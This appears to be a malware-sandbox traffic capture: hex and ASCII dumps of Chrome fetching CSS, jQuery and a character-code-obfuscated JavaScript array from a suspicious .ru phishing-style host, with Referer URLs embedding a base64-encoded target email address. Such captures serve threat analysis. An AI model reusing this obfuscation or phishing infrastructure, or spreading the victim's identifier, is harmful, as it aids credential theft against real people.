                                                                                                                                                                                    2024-01-26 13:41:51 UTC1369INData Raw: 34 31 33 5d 20 3d 20 31 30 32 3b 0a 50 57 44 4d 67 64 65 61 57 5b 34 31 34 5d 20 3d 20 31 30 32 3b 0a 50 57 44 4d 67 64 65 61 57 5b 34 31 35 5d 20 3d 20 31 30 32 3b 0a 50 57 44 4d 67 64 65 61 57 5b 34 31 36 5d 20 3d 20 35 39 3b 0a 50 57 44 4d 67 64 65 61 57 5b 34 31 37 5d 20 3d 20 39 38 3b 0a 50 57 44 4d 67 64 65 61 57 5b 34 31 38 5d 20 3d 20 31 31 31 3b 0a 50 57 44 4d 67 64 65 61 57 5b 34 31 39 5d 20 3d 20 31 31 34 3b 0a 50 57 44 4d 67 64 65 61 57 5b 34 32 30 5d 20 3d 20 31 30 30 3b 0a 50 57 44 4d 67 64 65 61 57 5b 34 32 31 5d 20 3d 20 31 30 31 3b 0a 50 57 44 4d 67 64 65 61 57 5b 34 32 32 5d 20 3d 20 31 31 34 3b 0a 50 57 44 4d 67 64 65 61 57 5b 34 32 33 5d 20 3d 20 34 35 3b 0a 50 57 44 4d 67 64 65 61 57 5b 34 32 34 5d 20 3d 20 31 31 34 3b 0a 50 57 44 4d
                                                                                                                                                                                    Data Ascii: 413] = 102;PWDMgdeaW[414] = 102;PWDMgdeaW[415] = 102;PWDMgdeaW[416] = 59;PWDMgdeaW[417] = 98;PWDMgdeaW[418] = 111;PWDMgdeaW[419] = 114;PWDMgdeaW[420] = 100;PWDMgdeaW[421] = 101;PWDMgdeaW[422] = 114;PWDMgdeaW[423] = 45;PWDMgdeaW[424] = 114;PWDM
                                                                                                                                                                                    2024-01-26 13:41:51 UTC1369INData Raw: 20 31 30 35 3b 0a 50 57 44 4d 67 64 65 61 57 5b 34 37 37 5d 20 3d 20 31 30 33 3b 0a 50 57 44 4d 67 64 65 61 57 5b 34 37 38 5d 20 3d 20 31 31 30 3b 0a 50 57 44 4d 67 64 65 61 57 5b 34 37 39 5d 20 3d 20 35 38 3b 0a 50 57 44 4d 67 64 65 61 57 5b 34 38 30 5d 20 3d 20 39 39 3b 0a 50 57 44 4d 67 64 65 61 57 5b 34 38 31 5d 20 3d 20 31 30 31 3b 0a 50 57 44 4d 67 64 65 61 57 5b 34 38 32 5d 20 3d 20 31 31 30 3b 0a 50 57 44 4d 67 64 65 61 57 5b 34 38 33 5d 20 3d 20 31 31 36 3b 0a 50 57 44 4d 67 64 65 61 57 5b 34 38 34 5d 20 3d 20 31 30 31 3b 0a 50 57 44 4d 67 64 65 61 57 5b 34 38 35 5d 20 3d 20 31 31 34 3b 0a 50 57 44 4d 67 64 65 61 57 5b 34 38 36 5d 20 3d 20 31 32 35 3b 0a 50 57 44 4d 67 64 65 61 57 5b 34 38 37 5d 20 3d 20 33 35 3b 0a 50 57 44 4d 67 64 65 61 57 5b
                                                                                                                                                                                    Data Ascii: 105;PWDMgdeaW[477] = 103;PWDMgdeaW[478] = 110;PWDMgdeaW[479] = 58;PWDMgdeaW[480] = 99;PWDMgdeaW[481] = 101;PWDMgdeaW[482] = 110;PWDMgdeaW[483] = 116;PWDMgdeaW[484] = 101;PWDMgdeaW[485] = 114;PWDMgdeaW[486] = 125;PWDMgdeaW[487] = 35;PWDMgdeaW[
                                                                                                                                                                                    2024-01-26 13:41:51 UTC1369INData Raw: 38 3b 0a 50 57 44 4d 67 64 65 61 57 5b 35 34 30 5d 20 3d 20 39 38 3b 0a 50 57 44 4d 67 64 65 61 57 5b 35 34 31 5d 20 3d 20 31 31 31 3b 0a 50 57 44 4d 67 64 65 61 57 5b 35 34 32 5d 20 3d 20 31 31 36 3b 0a 50 57 44 4d 67 64 65 61 57 5b 35 34 33 5d 20 3d 20 31 30 34 3b 0a 50 57 44 4d 67 64 65 61 57 5b 35 34 34 5d 20 3d 20 31 32 35 3b 0a 50 57 44 4d 67 64 65 61 57 5b 35 34 35 5d 20 3d 20 31 30 30 3b 0a 50 57 44 4d 67 64 65 61 57 5b 35 34 36 5d 20 3d 20 31 30 35 3b 0a 50 57 44 4d 67 64 65 61 57 5b 35 34 37 5d 20 3d 20 31 31 38 3b 0a 50 57 44 4d 67 64 65 61 57 5b 35 34 38 5d 20 3d 20 33 32 3b 0a 50 57 44 4d 67 64 65 61 57 5b 35 34 39 5d 20 3d 20 34 36 3b 0a 50 57 44 4d 67 64 65 61 57 5b 35 35 30 5d 20 3d 20 39 39 3b 0a 50 57 44 4d 67 64 65 61 57 5b 35 35 31 5d
                                                                                                                                                                                    Data Ascii: 8;PWDMgdeaW[540] = 98;PWDMgdeaW[541] = 111;PWDMgdeaW[542] = 116;PWDMgdeaW[543] = 104;PWDMgdeaW[544] = 125;PWDMgdeaW[545] = 100;PWDMgdeaW[546] = 105;PWDMgdeaW[547] = 118;PWDMgdeaW[548] = 32;PWDMgdeaW[549] = 46;PWDMgdeaW[550] = 99;PWDMgdeaW[551]


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    38192.168.2.1649773104.21.79.94436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:52 UTC743OUTGET /VyRsmGftiIlOxrabXBIOtQtS/6VgXjpQhSkDxT/1GTjuH2PpS3PpDRx HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                                                    Referer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/?0HbagOxTQkTz?080cc3b5ddZGF2aWQueXZvbkBhZnRyYWwuY29t
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:41:52 UTC729INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:52 GMT
                                                                                                                                                                                    Content-Type: text/css;charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=11Okg9Bn9Mm58oPcoZ2W0eppxBSJxgKuyz8ZnWhqgrQBnhcex9Q53xlUFNk7WjJYn9zYjGKSP%2FBGaLTeZeXPIuAJTA6KavqVkUTXXw3H5G7%2BzijcB6g2dTBT5SdLTTFVIVCP5CFDpnAJOFFdCWZYASrh%2By4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92d0bce3a12d9-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:52 UTC640INData Raw: 31 37 36 34 0d 0a 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 7d 61 72 74 69 63 6c 65 2c 61 73 69 64 65 2c 64 65 74 61 69 6c 73 2c 66 69 67 63 61 70 74 69 6f 6e 2c 66 69 67 75 72 65 2c 66 6f 6f 74 65 72 2c 68 65 61 64 65 72 2c 68 67 72 6f 75 70 2c 6d 61 69 6e 2c 6d 65 6e 75 2c 6e 61 76 2c 73 65 63 74 69 6f 6e 2c 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 61 75 64 69 6f 2c 63 61 6e 76 61 73 2c 70 72 6f 67 72 65 73 73 2c 76 69 64 65 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f
                                                                                                                                                                                    Data Ascii: 1764html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-blo
                                                                                                                                                                                    2024-01-26 13:41:52 UTC1369INData Raw: 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 73 75 70 7b 74 6f 70 3a 2d 2e 35 65 6d 7d 73 75 62 7b 62 6f 74 74 6f 6d 3a 2d 2e 32 35 65 6d 7d 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 73 76 67 3a 6e 6f 74 28 3a 72 6f 6f 74 29 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 66 69 67 75 72 65 7b 6d 61 72 67 69 6e 3a 31 65 6d 20 34 30 70 78 7d 68 72 7b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 68 65 69 67 68 74 3a 30 7d 70 72 65 7b 6f 76 65 72 66 6c 6f 77 3a 61 75 74 6f 7d 63 6f 64 65 2c 6b 62 64 2c 70 72 65 2c 73 61 6d 70 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 6f 73 70 61 63 65 2c 6d 6f 6e 6f 73 70 61 63 65 3b 66 6f 6e 74
                                                                                                                                                                                    Data Ascii: tical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{-moz-box-sizing:content-box;box-sizing:content-box;height:0}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospace;font
                                                                                                                                                                                    2024-01-26 13:41:52 UTC1369INData Raw: 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 3a 62 65 66 6f 72 65 2c 3a 61 66 74 65 72 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 69 6e 70 75 74 2c 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 61 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 74 68 69 6e 20 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 3a 35 70 78 20 61 75 74 6f 20 2d 77 65 62 6b 69 74 2d 66 6f
                                                                                                                                                                                    Data Ascii: -sizing:border-box}:before,:after{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}input,button,select,textarea{font-family:inherit;font-size:inherit;line-height:inherit}a:focus{outline:thin dotted;outline:5px auto -webkit-fo
                                                                                                                                                                                    2024-01-26 13:41:52 UTC1369INData Raw: 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 3a 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 30 30 36 37 62 38 7d 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 36 37 62 38 7d 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 36 36 36 7d 61 3a 66 6f 63 75 73 7b 63 6f 6c 6f 72 3a 23 30 30 36 37 62 38 7d 61 3a 61 63 74 69 76 65 7b 63 6f 6c 6f 72 3a 23 39 39 39 7d 2e 74 65 78 74 2d 63 65 6e 74 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 74 65 78 74 2d 6a 75 73 74 69 66 79 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6a 75 73 74 69 66 79 7d 2e 74 65 78 74 2d 6e 6f 77 72 61 70 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 74 65 78 74 2d 6c 6f 77 65 72 63 61 73 65 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6c 6f 77 65 72 63 61 73 65
                                                                                                                                                                                    Data Ascii: oration:none}a:link{color:#0067b8}a:visited{color:#0067b8}a:hover{color:#666}a:focus{color:#0067b8}a:active{color:#999}.text-center{text-align:center}.text-justify{text-align:justify}.text-nowrap{white-space:nowrap}.text-lowercase{text-transform:lowercase
                                                                                                                                                                                    2024-01-26 13:41:52 UTC1249INData Raw: 73 2d 31 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 6d 61 78 2d 68 65 69 67 68 74 3a 38 34 2e 35 34 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 35 2e 32 38 33 39 35 72 65 6d 7d 2e 74 65 78 74 2d 68 65 61 64 6c 69 6e 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 32 7b 6d 61 78 2d 68 65 69 67 68 74 3a 31 36 34 2e 35 34 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 2e 32 38 33 39 35 72 65 6d 7d 2e 74 65 78 74 2d 68 65 61 64 6c 69 6e 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 7b 6d 61 78 2d 68 65 69 67 68 74 3a 32 34 34 2e 35 34 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 35 2e 32 38 33 39 35 72 65 6d 7d 2e 74 65 78 74 2d 68 65 61 64 6c 69 6e 65
                                                                                                                                                                                    Data Ascii: s-1{white-space:nowrap;text-overflow:ellipsis;max-height:84.5432px;max-height:5.28395rem}.text-headline.text-maxlines-2{max-height:164.5432px;max-height:10.28395rem}.text-headline.text-maxlines-3{max-height:244.5432px;max-height:15.28395rem}.text-headline
                                                                                                                                                                                    2024-01-26 13:41:52 UTC1369INData Raw: 37 66 66 61 0d 0a 39 37 36 35 72 65 6d 7d 2e 74 65 78 74 2d 73 75 62 68 65 61 64 65 72 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 2c 68 32 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 7b 6d 61 78 2d 68 65 69 67 68 74 3a 31 32 36 2e 33 36 32 34 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 37 2e 38 39 37 36 35 72 65 6d 7d 2e 74 65 78 74 2d 73 75 62 68 65 61 64 65 72 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 34 2c 68 32 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 34 7b 6d 61 78 2d 68 65 69 67 68 74 3a 31 36 36 2e 33 36 32 34 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 2e 33 39 37 36 35 72 65 6d 7d 2e 74 65 78 74 2d 74 69 74 6c 65 2c 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 38 70 78 3b 66 6f 6e
                                                                                                                                                                                    Data Ascii: 7ffa9765rem}.text-subheader.text-maxlines-3,h2.text-maxlines-3{max-height:126.3624px;max-height:7.89765rem}.text-subheader.text-maxlines-4,h2.text-maxlines-4{max-height:166.3624px;max-height:10.39765rem}.text-title,h3{font-size:24px;line-height:28px;fon
                                                                                                                                                                                    2024-01-26 13:41:52 UTC1369INData Raw: 74 2d 73 69 7a 65 3a 2e 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 2e 38 37 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 2e 31 38 31 36 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 2e 31 38 31 36 70 78 7d 2e 74 65 78 74 2d 63 61 70 74 69 6f 6e 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 2c 68 35 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 36 2e 33 36 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 2e 30 32 32 37 72 65 6d 7d 2e 74 65 78 74 2d 63 61 70 74 69 6f 6e 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 32 2c 68 35 2e 74 65 78 74 2d 6d 61 78 6c 69
                                                                                                                                                                                    Data Ascii: t-size:.75rem;line-height:.875rem;padding-bottom:1.1816px;padding-top:1.1816px}.text-caption.text-maxlines-1,h5.text-maxlines-1{white-space:nowrap;text-overflow:ellipsis;max-height:16.3632px;max-height:1.0227rem}.text-caption.text-maxlines-2,h5.text-maxli
                                                                                                                                                                                    2024-01-26 13:41:52 UTC1369INData Raw: 2d 68 65 69 67 68 74 3a 31 2e 33 30 36 38 72 65 6d 7d 2e 74 65 78 74 2d 73 75 62 63 61 70 74 69 6f 6e 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 7b 6d 61 78 2d 68 65 69 67 68 74 3a 33 30 2e 39 30 38 38 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 2e 39 33 31 38 72 65 6d 7d 2e 74 65 78 74 2d 73 75 62 63 61 70 74 69 6f 6e 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 34 7b 6d 61 78 2d 68 65 69 67 68 74 3a 34 30 2e 39 30 38 38 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 32 2e 35 35 36 38 72 65 6d 7d 2e 74 65 78 74 2d 62 6f 64 79 2c 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 39 33 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65
                                                                                                                                                                                    Data Ascii: -height:1.3068rem}.text-subcaption.text-maxlines-3{max-height:30.9088px;max-height:1.9318rem}.text-subcaption.text-maxlines-4{max-height:40.9088px;max-height:2.5568rem}.text-body,p{font-size:15px;line-height:20px;font-weight:400;font-size:.9375rem;line-he
                                                                                                                                                                                    2024-01-26 13:41:52 UTC1369INData Raw: 32 30 70 78 7d 75 6c 20 6c 69 2c 6f 6c 20 6c 69 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 32 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 32 70 78 7d 2e 6c 69 73 74 2d 69 6e 6c 69 6e 65 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 70 78 7d 2e 6c 69 73 74 2d 69 6e 6c 69 6e 65 3e 6c 69 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 34 70 78 7d 62 6c 6f 63 6b 71 75 6f 74 65 7b 70 61 64 64 69 6e 67 3a 38 70 78 20 31 32 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 32 70 78 7d 2e 62 6c 6f 63 6b 71 75 6f 74 65 2d 72 65 76 65 72 73 65 2c 62 6c 6f 63 6b 71
                                                                                                                                                                                    Data Ascii: 20px}ul li,ol li{margin-top:12px;margin-bottom:12px}.list-inline{padding-left:0;list-style:none;margin-left:-4px}.list-inline>li{display:inline-block;padding-left:4px;padding-right:4px}blockquote{padding:8px 12px;margin:0 0 12px}.blockquote-reverse,blockq
                                                                                                                                                                                    2024-01-26 13:41:52 UTC1369INData Raw: 63 6f 6c 2d 78 73 2d 31 35 2c 2e 63 6f 6c 2d 73 6d 2d 31 35 2c 2e 63 6f 6c 2d 6d 64 2d 31 35 2c 2e 63 6f 6c 2d 6c 67 2d 31 35 2c 2e 63 6f 6c 2d 78 73 2d 31 36 2c 2e 63 6f 6c 2d 73 6d 2d 31 36 2c 2e 63 6f 6c 2d 6d 64 2d 31 36 2c 2e 63 6f 6c 2d 6c 67 2d 31 36 2c 2e 63 6f 6c 2d 78 73 2d 31 37 2c 2e 63 6f 6c 2d 73 6d 2d 31 37 2c 2e 63 6f 6c 2d 6d 64 2d 31 37 2c 2e 63 6f 6c 2d 6c 67 2d 31 37 2c 2e 63 6f 6c 2d 78 73 2d 31 38 2c 2e 63 6f 6c 2d 73 6d 2d 31 38 2c 2e 63 6f 6c 2d 6d 64 2d 31 38 2c 2e 63 6f 6c 2d 6c 67 2d 31 38 2c 2e 63 6f 6c 2d 78 73 2d 31 39 2c 2e 63 6f 6c 2d 73 6d 2d 31 39 2c 2e 63 6f 6c 2d 6d 64 2d 31 39 2c 2e 63 6f 6c 2d 6c 67 2d 31 39 2c 2e 63 6f 6c 2d 78 73 2d 32 30 2c 2e 63 6f 6c 2d 73 6d 2d 32 30 2c 2e 63 6f 6c 2d 6d 64 2d 32 30 2c 2e 63 6f
                                                                                                                                                                                    Data Ascii: col-xs-15,.col-sm-15,.col-md-15,.col-lg-15,.col-xs-16,.col-sm-16,.col-md-16,.col-lg-16,.col-xs-17,.col-sm-17,.col-md-17,.col-lg-17,.col-xs-18,.col-sm-18,.col-md-18,.col-lg-18,.col-xs-19,.col-sm-19,.col-md-19,.col-lg-19,.col-xs-20,.col-sm-20,.col-md-20,.co


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    39192.168.2.1649774104.21.79.94436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:52 UTC722OUTGET /VyRsmGftiIlOxrabXBIOtQtS/6X8VIE8xj/7PshMcgyswItA HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                    Referer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/?0HbagOxTQkTz?080cc3b5ddZGF2aWQueXZvbkBhZnRyYWwuY29t
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:41:52 UTC740INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:52 GMT
                                                                                                                                                                                    Content-Type: text/javascript;charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=P7q0gdF%2FxSzvWX2cJTrKbFpmi3Vxm1%2Byb9VVq3MPgKAH2xUXHRrji1q4sqjMIkcZJnwex%2B%2FYDubjpQIBq4eQDeoagvCmc9pnpSPalGfzaAZP3I27GCYhv2u95qZALaxBQHfYzf9JiE5vRedUx2LAa2A%2B84Y%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92d0bd804454b-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:52 UTC629INData Raw: 37 63 63 62 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22
                                                                                                                                                                                    Data Ascii: 7ccb/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("
                                                                                                                                                                                    2024-01-26 13:41:52 UTC1369INData Raw: 74 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 74 26 26 74 3d 3d 3d 74 2e 77 69 6e 64 6f 77 7d 2c 76 3d 7b 74 79 70 65 3a 21 30 2c 73 72 63 3a 21 30 2c 6e 6f 4d 6f 64 75 6c 65 3a 21 30 7d 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 74 2c 6e 29 7b 76 61 72 20 69 2c 6f 3d 28 74 3d 74 7c 7c 72 29 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 69 66 28 6f 2e 74 65 78 74 3d 65 2c 6e 29 66 6f 72 28 69 20 69 6e 20 76 29 6e 5b 69 5d 26 26 28 6f 5b 69 5d 3d 6e 5b 69 5d 29 3b 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6f 29 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 78 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 65 2b 22 22 3a 22 6f 62 6a 65 63 74
                                                                                                                                                                                    Data Ascii: t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement("script");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object
